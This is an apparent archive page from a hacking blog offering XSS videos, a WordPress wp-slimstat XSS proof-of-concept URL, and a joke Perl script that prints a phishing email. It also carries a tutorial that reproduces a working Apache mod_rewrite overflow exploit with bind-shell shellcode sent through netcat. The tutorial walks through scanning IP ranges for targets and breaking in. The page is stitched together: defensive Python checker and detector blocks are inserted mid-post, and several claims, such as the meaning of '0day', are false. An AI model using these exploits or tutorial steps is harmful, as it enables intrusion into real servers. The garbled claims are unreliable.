Archive for Howto XSS Hack

XSS Injection by SyntaxShadow

In this video the master hackers of SyntaxShadow demonstrate how to perform injections using XSS (Cross-Site Scripting).

SyntaxShadow are experts in the field of programming and hacking, and make videos demonstrating just how much hackers can do in so little time.

For more hacking videos please visit our XSS Hacking Video page and the XSS WORM Hacker Video archives.


Website hacking with XSS - Full Disclosure

In this episode of Full Disclosure, the whitehat hackers explain how to hack into any website using a Cross-Site Scripting attack.

Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client-side script, such as JavaScript, into the website.


How XSS Hacking Really Works

In this video tutorial we show you how to do basic cross-site scripting attacks against a vBulletin forum. This tutorial shows the basics of cookie stealing, JavaScript injection and forum hacking.


0day inject Exploit for Wordpress 2.3 - xssworm.com - all versions vulnerable with no patch

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious hole in WordPress 2.3 that a blackhat hacker can use with XSS to attack the WordPress administrator and steal cookies from blogmins. This attack is known as a 0day because it has just been reported to the public and this is the first day the vulnerability is public; 0day means ‘published’.

Below is a demonstration attack against the WordPress install at http://xssworm.blogvis.com. Please do not use it for your own attacks, as we do not have a patch for this 0day exploit. The XSSWorm admin has been alerted and is looking for suspicious clicks (-;

[Screenshot: XSS proof of concept (hosted on ImageShack)]

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack is used against the WordPress blog admin (the blogmin) to steal the blogosphere token and hack blogs. Of course we have included exploit code for this bug below.

We have looked at the code of wp-slimstat but we cannot see any problem with input validation. Maybe some xssworm.com readers can show us where the problem is in the PHP code, because we cannot see any problem here:

--snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
'.(!empty($myFilterString)?'— <a href="?page='.$_GET['page'].'&panel='.$_GET["panel"].'">'.__('Reset filters', 'wp-slimstat').'</a>':'').'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET["panel"].'" />
<input type="hidden" name="fd" value="'.$_GET["fd"].'" /></form>';

--snips

With the programmer putting $_GET variables from the user straight into the echoed HTML output, maybe PHP's automatic GET validation filtering is not working for security? We are not PHP programmers, so we cannot see any problem here, as the bug is too complex to understand.
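An added reviewer's answer to the question above, not part of the original post: a small Python checker run over the quoted wp-slimstat lines (copied here with ASCII quotes) that separates the intval()-cast parameters from the ones spliced straight into the HTML string, plus the escaping the fixed output needs. PHP applies no HTML escaping to $_GET on its own; the names review, unescaped_sinks and hidden_input are this example's, and the PHP fix it mirrors is htmlspecialchars() with ENT_QUOTES around each value.

```python
import html
import re

# The wp-slimstat 0.92 lines quoted in the post, embedded here as the input to
# review (copied from the page, with the blog's curly quotes turned back to ASCII).
SNIPPET = r"""
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
'.(!empty($myFilterString)?'- <a href="?page='.$_GET['page'].'&panel='.$_GET["panel"].'">'.__('Reset filters', 'wp-slimstat').'</a>':'').'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET["panel"].'" />
<input type="hidden" name="fd" value="'.$_GET["fd"].'" /></form>';
"""

# Optional intval( ... ) wrapper, then the $_GET['name'] read.
GET_PARAM = re.compile(r"""(intval\(\s*)?\$_GET\[["'](\w+)["']\]""")


def review(php_source):
    """One finding per $_GET use: (line, param, verdict).
    int  - cast with intval(), cannot carry markup
    raw  - copied into a variable unescaped; follow where it flows
    html - spliced straight into the HTML string: reflected XSS sink"""
    findings = []
    for no, line in enumerate(php_source.strip().splitlines(), 1):
        for m in GET_PARAM.finditer(line):
            if m.group(1):
                verdict = "int"
            elif "'." in line[:m.start()] and ".'" in line[m.end():]:
                verdict = "html"   # '...'.$_GET[x].'...' concatenation
            else:
                verdict = "raw"
            findings.append((no, m.group(2), verdict))
    return findings


def unescaped_sinks(php_source):
    """Parameter names that reach the HTML output without escaping."""
    return sorted({p for _, p, v in review(php_source) if v == "html"})


def hidden_input(name, value):
    """The hardened output: every value HTML-attribute-escaped first. In the
    plugin's PHP this is htmlspecialchars($v, ENT_QUOTES) around each $_GET."""
    return '<input type="hidden" name="%s" value="%s" />' % (
        html.escape(name, quote=True), html.escape(value, quote=True))
```

Run over the snippet, review() reports page, panel and fd as unescaped sinks (five occurrences) while ff and ft are safe through intval(), and fi/fd are raw copies whose later use the snippet does not show.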

Exploit code for Perl whitehats is included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <STDIN>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <STDIN>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n -- CUT OUTPUT HERE -- \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <xssworm\@hotmail.com>\n";   # \@ so Perl does not interpolate an array
print "RCPT TO: <$target>\n";
print "DATA\n"; print "Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n -- END OF OUTPUT CUT HERE --\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj\@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); exit(0);   # was return(0), which is a fatal error outside a subroutine
# snips
#

Please note that this wp-slimstat does not contain any code injection or MySQL injection bug vector that is open to blackhat attack via the XSS transport.

Many thanks for your comments on this vulnerability in WordPress 2.4

Thanks vaj


How to Hack Tutorials - Hacking and Defacing Web Sites with Exploits

Today we have a very special post: a hacking tutorial by the blackhat hacker Sunjester.

But first you need to download the following exploit:

http://www.milw0rm.com/exploits/2237
OK, so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P 

echo -e "mod_rewrite apache off-by-one overflow"
echo    "by jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

# milw0rm.com [2006-08-21]
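An added defender-side example, not part of Sunjester's post or the milw0rm script: a Python detector that picks the request shape used above (an ldap:// URL sent through the RewriteRule path with a long %-encoded NOP sled and shellcode) out of Apache access-log lines. The log lines are constructed for this example and the function names (classify, alerts) are mine.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache combined-log lines for this example (not real traffic).
# The first carries the request shape of the milw0rm script above: an ldap://
# URL sent through the rewrite path, 128 x %90 NOP sled, then %-encoded code.
SLED = "%90" * 128
ACCESS_LOG = "\n".join([
    '203.0.113.5 - - [21/Aug/2006:10:14:02 +0000] "GET /kung/ldap://localhost/'
    + SLED + '%89%e6%31%c0%31%db HTTP/1.1" 400 226 "-" "-"',
    '198.51.100.7 - - [21/Aug/2006:10:14:30 +0000] "GET /kung/index.html '
    'HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [21/Aug/2006:10:15:11 +0000] "GET /kung/ldap://ldap.example/'
    'o=acme HTTP/1.1" 302 0 "-" "-"',
])

# ip, timestamp, method, path, status from the front of a combined-format line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
MIN_RUN = 32  # consecutive bytes >= 0x80 before we call it a sled/shellcode

def longest_high_run(raw):
    """Length of the longest run of non-ASCII bytes in a decoded path."""
    best = cur = 0
    for b in raw:
        cur = cur + 1 if b >= 0x80 else 0
        best = max(best, cur)
    return best

def classify(line):
    """Parse one log line; list the exploit indicators it shows (maybe none)."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, _method, path, status = m.groups()
    decoded = unquote_to_bytes(path)       # undo the %xx encoding once
    reasons = []
    if b"ldap://" in decoded.lower():      # the URL scheme CVE-2006-3747 is reached through
        reasons.append("ldap-scheme-in-path")
    run = longest_high_run(decoded)
    if run >= MIN_RUN:                     # NOP sled / machine code, not text
        reasons.append("binary-run:%d" % run)
    return {"ip": ip, "time": ts, "status": status, "path": path, "reasons": reasons}

def alerts(log_text):
    """Requests showing both indicators: treat as an exploit attempt."""
    found = (classify(l) for l in log_text.splitlines())
    return [c for c in found if c and len(c["reasons"]) == 2]
```

A plain ldap:// request without the binary run (the third constructed line) only gets the scheme indicator, so it is worth a look but does not raise an alert on its own.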

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for those who have no idea what to do, with that in mind, let's continue.
If you are stuck already and don't know where to get a shell, Sunjester recommends BackTrack:

if you are stuck already and don't know where to get or how to use a shell, I'm using a live CD, BackTrack. let's do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

[Figure 1: downloading the exploit with wget]

Step 2: Sunjester says to all elite hacker students:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say something like “Permission Denied”.

Example:

Sunjester says we need to change the file's permissions, because:

this ain't Windows, this is a secure filesystem.

ok?

so let's chmod that bad boy, might as well give it 777 since I'm root and it's just a live CD. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as I said, since I'm root, and it's a friggin live CD, this will be fine.

you should never run scripts under root on your own box.

Step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace the &quot; with double quotes.

Sunjester: once you're done you can save and quit vi or whatever editor you used and run it. should come out something like below.

now that the script is working, let's look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website, since we will scan a whole range of IP addresses. so type something like:

Sunjester says to start there (festival.com) and scan away.
remember to save logs so it's easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about what's on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, let's check and see if the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of the screenshots of hacking into FESTIVAL.COM ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says: ” sweet, netcat your way in :P this should be the end of the road. if you are still having problems running this small script, seek help. you need help. “

With special thanks to http://elitehackers.info/?pwnd=true


Video: Hacker expert says Metacafe can be hacked with XSS Worm

The hacker PsychoGun has discovered many security vulnerabilities in the popular video site Metacafe, including new serious XSS exploits.

Vulnerabilities are security holes used by hackers to hack websites or their users. When we search Metacafe for the keyword hacking, we can see many hacking videos.

“I do not understand why videos which speak about hacking Metacafe vulnerabilities can be rejected, whereas many videos of hacking Windows are rewarded,” says the hacker PsychoGun. “Does somebody have an answer?”

Visitors, please comment if you have knowledge of hacking Metacafe videos or if you have seen these tricks before.

If you are new to XSS Hacking you must view our special How To Hack blogs and leave comments.

Thank you
